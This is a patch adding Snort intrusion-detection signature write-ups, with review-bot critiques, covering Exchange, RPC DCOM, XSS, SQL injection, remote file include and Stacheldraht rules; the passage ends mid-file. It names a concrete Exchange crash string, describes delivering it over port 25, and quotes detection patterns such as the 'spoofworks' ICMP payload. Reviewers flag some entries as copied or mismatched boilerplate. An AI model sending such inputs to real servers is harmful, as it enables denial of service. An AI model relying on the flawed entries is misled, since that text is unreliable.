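Review bot: the Affected Systems section is empty; for a generic directory traversal rule it should at least repeat what Detailed Information says ("web, web applications and ftp servers that do not correctly check the path to a file"). Attack Scenarios mentions only "the ftp root directory" although the Summary and Detailed Information cover web servers too, so generalize it. "Rule:  " and the "-- " separator before Additional References carry trailing whitespace, and "Apply the appropriate vendor supplied patches" lacks its full stop.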
--- /dev/null
+++ b/doc/signatures/658.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+658
+
+--
+Summary:
+This event is generated when a denial of service is attempted on a Microsoft Exchange mail server.
+
+--
+Impact:
+Denial of service.  This will cause the Exchange server to fail.  
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft Exchange 5.5 that causes a denial of service if a MIME header contains the string 'charset = ""'.  The Exchange server does not properly handle this MIME header string, causing it to crash.
+
+--
+Affected Systems:
+Microsoft Exchange server 5.5
+
+--
+Attack Scenarios:
+An attacker can supply a malicious string in the MIME header causing the Exchange server to fail. 
+
+--
+Ease of Attack:
+Easy.  An attacker can telnet to port 25 of the Exchange server, start a dialogue with the server, and supply the malicious string in the MIME header.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to Exchange 5.5 service Pack 4.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms00-082.asp 
+
+Miscellaneous:
+http://packetstormsecurity.nl/0011-exploits/exchange.dos.txt
+
+
+--
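Review bot: "upgrade to Exchange 5.5 service Pack 4" in Corrective Action should capitalize "Service Pack 4". The Impact line ("Denial of service.  This will cause the Exchange server to fail.  ") and the Microsoft reference URL carry trailing whitespace, and False Positives/False Negatives use "None Known." where the other files in this patch use "None known.".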
--- /dev/null
+++ b/doc/signatures/100000778.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000778
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "PHPMailList" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "email" parameter in the "maillist.php" script used by the "PHPMailList" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMailList
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
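Review bot: the Impact section is the remote-file-include boilerplate ("Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code") and does not describe a cross site scripting issue; for XSS the impact is script execution in a victim's browser and theft of the user's data, which is what the Attack Scenarios line itself says. Likewise "execute system binaries or malicious code of the attackers choosing" in Detailed Information is not an XSS consequence, and "attackers" wants the possessive. The file also starts with two blank lines before "Rule:", and the Affected Systems line lacks the blank line before "--".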
--- /dev/null
+++ b/doc/signatures/100000500.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000500
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PictureDis" application running on a webserver. 
+Access to the file "wpfiles.php" using a remote file being passed as the "lang" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "lang" parameter in the "wpfiles.php" script used by the 
+"PictureDis" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PictureDis
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
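Review bot: "may indicate that an exploitation attempt has been attempted" in the Summary is redundant; "may indicate an exploitation attempt" is enough. "running ona web server" in Detailed Information should be "on a web server", "attackers choosing" (twice) wants the possessive, and the Affected Systems line lacks the blank line before its "--" separator.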
--- /dev/null
+++ b/doc/signatures/2177.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+folder via SMB. 
+
+--
+Impact:
+Serious. This folder contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a folder
+containing important operating system files using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this folder is accessible via SMB the attacker can replace or view
+important operating system files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
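Review bot: the Sid in this file is 2176 but the file is doc/signatures/2177.txt; one of the two is wrong, and the mismatch means the document will not be found for the rule it describes. The text also never names which "system folder" the rule matches, so Summary, Impact and Attack Scenarios cannot be checked; naming the folder or share path the rule looks for would make them verifiable. There is an extra blank line after the Sid value, and "None Known." in False Negatives differs from the "None known." used in False Positives.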
--- /dev/null
+++ b/doc/signatures/2495.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2495
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft RPC service.
+
+--
+Impact:
+Denial of Service (DoS). Possible execution of arbitrary code leading to
+unauthorized remote access to the victim host.
+
+--
+Detailed Information:
+It may be possible for an attacker to cause a DoS condition in the
+Microsoft RPC service when multiple simultaneous requests are made to a
+vulnerable host. This can lead to an exhaustion of system resources
+causing the DoS.
+
+--
+Affected Systems:
+	Windows systems running RPC services
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the RPC service many times in an
+attempt to cause the DoS condition to occur.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
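Review bot: the Impact section claims "Possible execution of arbitrary code leading to unauthorized remote access to the victim host", but Detailed Information only describes resource exhaustion from many simultaneous bind requests; either document where code execution comes from or drop the claim. "Apply the appropriate vendor supplied patches" lacks its full stop and the first Corrective Action line carries trailing whitespace.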
--- /dev/null
+++ b/doc/signatures/3343.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3343
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
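Review bot: this file is a line-for-line copy of doc/signatures/3428.txt, including the same "Expoit code exists." typo and the same Attack Scenarios text about "an overly long filename via a network share" that does not match the RPC DCOM vulnerability described. If sids 3343 and 3428 cover the same vulnerability, say what distinguishes them (port, transport or pattern) instead of duplicating the text verbatim.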
--- /dev/null
+++ b/doc/signatures/100000315.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+Sid:
+100000315
+
+--
+Summary:
+This event is generated when an HTTP client issues a PUT request to upload
+a document into the web content area.
+
+--
+Impact:
+The PUT method is a legitimate HTTP command that allows an authorized user
+to upload a document into the web content tree. It is most often associated 
+with the WebDAV content management protocol.  
+
+Although there are some legitimate uses for the PUT method, it is also a
+frequent source of web site defacement, as attackers can easily abuse 
+misconfigured web servers that allow unrestricted PUT functionality from 
+arbitrary users.
+
+--
+Detailed Information:
+The rule searches for HTTP requests using the PUT method, and tracks 
+these sessions.  The rule is intended to be used with SID 100000316 to 
+track successful PUT requests, which may represent successful defacement
+attacks, instead of all PUT requests.
+
+Administrators who wish to track all PUT requests (successful or not) should 
+remove the "flowbits:noalert;" section of this rule.
+
+--
+Affected Systems:
+Any web server
+
+--
+Attack Scenarios:
+An attacker can issue a PUT reuqest via a script, many different pieces of 
+software, or through a manual connection to any web server port.
+
+--
+Ease of Attack:
+Simple.  Numerous tools exist for creating PUT requests, including some geared
+specifically towards web site defacement.  
+
+--
+False Positives:
+Organizations that use WebDAV to manage their web content may experience
+false positives, as the PUT method is a normal part of the WebDAV protocol.
+Additionally, any other legitimate web applications which use the PUT method
+will generate false positives.
+
+--
+False Negatives:
+None
+
+--
+Corrective Action:
+In cases of web site defacement, delete the newly-created file(s) and/or 
+restore them from a reliable backup. In all cases, be sure to tune web server
+configuration to allow PUT requests only where necessary for a legitimate web
+application to function.
+
+--
+Contributors:
+David J. Bianco, <david@vorant.com>
+
+-- 
+Additional References:
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.6
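Review bot: "An attacker can issue a PUT reuqest via a script" in Attack Scenarios is a typo for "request". This is the only file in the patch that does not end with a "--" separator after Additional References, "Rule:  " and the "-- " line before Additional References carry trailing whitespace, and "False Negatives: None" should be "None known." for consistency. Since the rule carries "flowbits:noalert;" and is paired with SID 100000316, Detailed Information should state plainly that with that option in place this rule never alerts on its own.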
--- /dev/null
+++ b/doc/signatures/2378.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2378
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
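Review bot: the Summary names "Checkpoint VPN-1" while Affected Systems spells it "CheckPoint Software" and also lists FW-1 entries that appear nowhere else in the text; pick one spelling and mention FW-1 in the Summary or Detailed Information if it is in scope. "Ease of Attack: Proof of concept code exists." gives no difficulty level, unlike the "Simple." / "Difficult." used by the other files. "Rule:  " and the "-- " separator carry trailing whitespace, and the two Corrective Action lines lack full stops.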
--- /dev/null
+++ b/doc/signatures/3172.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3172
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
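Review bot: this is the third verbatim copy of the RPC DCOM text (see doc/signatures/3428.txt and 3343.txt), with the same "Expoit" typo and the same Attack Scenarios that do not match the RPC vulnerability described. One shared description with a per-sid note on what each rule matches would be easier to keep correct than three identical files.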
--- /dev/null
+++ b/doc/signatures/642.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 642
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing HP-UX UNIX network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS358
+
+--
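Review bot: "Original Rule Writer Unkown" in Contributors is a typo for "Unknown". The file has no Affected Systems section although Detailed Information names "HP-UX UNIX network services" as the target, and "Sid: 642" on a single line breaks the two-line "Sid:" / value layout used by every other file in this patch. "execute  attacker-controlled code" has a doubled space, "application-dependent however, a platform-specific" needs punctuation before "however", and "Rule: ", "Summary: " and the "-- " separators carry trailing whitespace.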
--- /dev/null
+++ b/doc/signatures/100000445.txt
@@ -0,0 +1,61 @@
+
+
+Rule:
+
+--
+Sid:
+100000445
+
+--
+Summary:
+Particle Gallery is susceptible to an injection attack due to a lack
+of input validation on the imageid variable used in the viewimage.php
+component.
+
+--
+Impact:
+The injection attack could result in data leakage, or potential remote
+compromise.
+
+--
+Detailed Information:
+Particle Gallery is prone to an SQL-injection vulnerability. This issue is due
+to a failure in the application to properly sanitize user-supplied input 
+before using it in an SQL query. 
+
+A successful exploit could allow an attacker to compromise the application,
+access or modify data, or exploit vulnerabilities in the underlying database
+implementation.
+
+The data type assigned to the column referenced by the variable is int, so
+there should never be any text or characters outside of the int used to
+identify the image.
+
+--
+Attack Scenarios:
+Variable manipulation can be done with any browser.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Edit code and add input validation.
+
+--
+Contributors:
+Dan Ramaswami <danr@sourcefire.com>
+
+-- 
+Additional References:
+
+-- 
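Review bot: the Summary says only "an injection attack" while Detailed Information identifies it as SQL injection; say "SQL injection" in the Summary too. There is no Affected Systems section, and the Corrective Action "Edit code and add input validation." should say what to validate; the paragraph above already states that imageid is an int, so "reject any non-integer imageid value" follows directly from the text. The file also starts with two blank lines before "Rule:", and the "-- " separators carry trailing whitespace.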
--- /dev/null
+++ b/doc/signatures/1012.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1012
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
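Review bot: the document never says which IIS vulnerability sid 1012 matches; "Many known vulnerabilities exist for this platform and the attack scenarios are legion" leaves Impact, Affected Systems and Corrective Action unverifiable, so name the request pattern the rule looks for. "attackers choosing" in Impact wants the possessive.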
--- /dev/null
+++ b/doc/signatures/1238.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1238
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
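Review bot: as with sid 1012, nothing in this document states what the rule matches; every section is generic web-server boilerplate and Detailed Information concedes "the attack scenarios are legion", so a reader cannot tell why sid 1238 fired. Name the pattern or file the rule detects. "attackers choosing" in Impact wants the possessive.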
--- /dev/null
+++ b/doc/signatures/1577.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1577
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
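Review bot: this file is identical to doc/signatures/1238.txt and has the same problem: nothing identifies what sid 1577 matches, so the documentation cannot distinguish it from 1238. Add the specific pattern or vulnerability for each sid. "attackers choosing" in Impact wants the possessive.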
--- /dev/null
+++ b/doc/signatures/385.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+385
+
+--
+Summary:
+This event is generated when a Windows traceroute (tracert) is detected.
+
+--
+Impact:
+Information gathering.  A traceroute can be used to discover live hosts and network topologies.
+
+--
+Detailed Information:
+A Windows traceroute command uses an ICMP echo request with a lower than normal Time to Live (TTL) value to identify live hosts and network topolgies.  The TTL value is manipulated by the sending host to discover all routers traversed from the source host to the destination host.  Eventually, a TTL value of 1 is observed, which elicits an ICMP error message of time exceeded in-transit.  A router sends this ICMP error message to the host running traceroute.  The traceroute host will record this as a router and continue to incrementally manipulate the TTL until the destination host is reached. 
+
+Additionally There are at least three different implementations of 
+traceroute.  In one implementation traceroute works by sending an ICMP 
+Echo Request packet to a destination host with a TTL value of 1.  If the
+host is more than one hop away, the first route that receives the back 
+will send back an ICMP packet indicating that the TTL was exceeded.  The
+address of this router is then listed as the first hop.  The packet is 
+then sent out again with a TTL of 2.  This continues until the 
+destination host is able to reply or some maximum TTL value is reached.
+
+The other two implementations use the same TTL-based concept with an
+ICMP type of 30(traceroute) or with an UDP packet destined for an
+ephemeral port.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may use a traceroute to discover live hosts and routers on a target network in preparation for an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The traceroute command may be used to legitimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS118
+
+--
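Review bot: "the first route that receives the back will send back an ICMP packet" in Detailed Information is garbled and should read "the first router that receives the packet will send back an ICMP packet". The same section has "topolgies" for "topologies", "Additionally There" with a stray capital, "30(traceroute)" missing a space, and "an UDP packet" for "a UDP packet". The first paragraph and the "In one implementation" paragraph describe the same ICMP echo TTL mechanism twice and could be merged. In Contributors, "contributed by  by Steven Alexander<alexander.s@mccd.edu>" has a doubled "by" and lacks the space before the address.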
--- /dev/null
+++ b/doc/signatures/1961.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1961
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rquotad is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rquotad is using.  Attackers can also learn what versions of the rquotad protocol are accepted by rquotad. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rquotad run.  The rquotad RPC service can be queried for user disk usage and the limits of a local file system which is mounted by a remote machine over NFS.  A vulnerability associated with rquotad may permit the execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rquotad runs.  This may be a precursor to accessing rquotad.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rquotad, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rquotad, not probes of the rquotad service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rquotad service itself. An attacker may attempt to go directly to the rquotad port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
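Review bot: Additional References is empty although Detailed Information states that "A vulnerability associated with rquotad may permit the execution of arbitrary commands with the privileges of root"; a documented root-level flaw should carry its advisory or CVE reference, or the sentence should name the affected rquotad versions, since as written a reader cannot tell whether their host is exposed. Style: there is a double blank line after the Summary paragraph, and "Easy.  " under Ease of Attack has trailing whitespace.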
--- /dev/null
+++ b/doc/signatures/227.txt
@@ -0,0 +1,56 @@
+Rule:
+--
+Sid:
+227
+
+--
+Summary:
+This event is generated when a Stacheldraht handler attempts to confirm that an agent has the ability to spoof a source IP.
+
+--
+Impact:
+Severe. This indicates that a Stacheldraht agent exists on the destination host. 
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  In order for an agent host to make a good participant in a distributed denial of service, it must be able to spoof source IPs to elude detection.  After a host becomes an agent, a test is conducted to see whether the agent can spoof a source IP.  If the handler receives such a communication from the agent, it responds with an ICMP echo request with an ICMP identification number of 1000 and a content of "spoofworks" in the payload. 
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A host on which a Stacheldraht agent has been installed will attempt to send a packet with a spoofed source IP to the handler. If the handler receives this communication, it will reply to the agent informing it that all 32 bits of source IP of DDoS traffic can be spoofed. 
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Use egress filtering in your network to prevent traffic leaving your network that is not part of the internal address space so source IPs cannot be spoofed.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS192
+
+--
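Review bot: Corrective Action only recommends egress filtering, but Impact states that this event "indicates that a Stacheldraht agent exists on the destination host"; the remediation should also say to investigate and rebuild or clean the host identified as the agent, since filtering alone leaves the compromise in place. Style: "Rule:" is immediately followed by "--" with no blank line, unlike the other files in this patch.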
--- /dev/null
+++ b/doc/signatures/497.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid: 497
+
+-- 
+Summary: 
+This event is generated by the successful completion of a file transfer operation. This may be indicative of post-compromise behavior indicating the use of a Windows command shell for copying files.
+
+-- 
+Impact: 
+Serious. An attacker may have the ability to transfer files from the victim host.
+
+-- 
+Detailed Information: 
